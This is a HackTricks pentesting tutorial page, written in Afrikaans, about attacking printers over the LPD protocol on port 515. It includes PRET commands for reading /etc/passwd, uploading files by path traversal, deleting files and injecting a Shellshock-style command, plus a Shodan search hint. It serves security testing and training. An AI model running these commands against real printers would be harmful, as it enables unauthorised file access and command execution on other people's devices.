515 - Pentesting Line Printer Daemon (LPD)

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Inleiding tot die LPD-protokol

In die 1980's is die Line Printer Daemon (LPD) protokol ontwikkel in Berkeley Unix, wat later geformaliseer is deur RFC1179. Hierdie protokol werk oor poort 515/tcp en maak interaksies moontlik deur die lpr-opdrag. Die essensie van drukwerk via LPD behels die stuur van 'n beheerlêer (om werksbesonderhede en gebruiker te spesifiseer) saam met 'n data-lêer (wat die drukinligting bevat). Terwyl die beheerlêer die keuse van verskeie lêerformate vir die data-lêer moontlik maak, word die hantering van hierdie lêers bepaal deur die spesifieke LPD-implementering. 'n Wyd erkenning implementering vir Unix-soortgelyke stelsels is LPRng. Merkwaardig kan die LPD-protokol uitgebuit word om skadelike PostScript of PJL-drukwerkopdragte uit te voer.

Hulpmiddels vir interaksie met LPD-drukkers

PRET stel twee essensiële hulpmiddels bekend, lpdprint en lpdtest, wat 'n eenvoudige metode bied om met LPD-verenigbare drukkers te interaksieer. Hierdie hulpmiddels maak 'n verskeidenheid aksies moontlik, van die druk van data tot die manipulering van lêers op die drukker, soos aflaai, oplaai of verwyder:

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Vir individue wat belangstel om die wêreld van drukkerhacking verder te verken, kan 'n omvattende bron hier gevind word: Hacking Printers.

Shodan

  • poort 515

Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated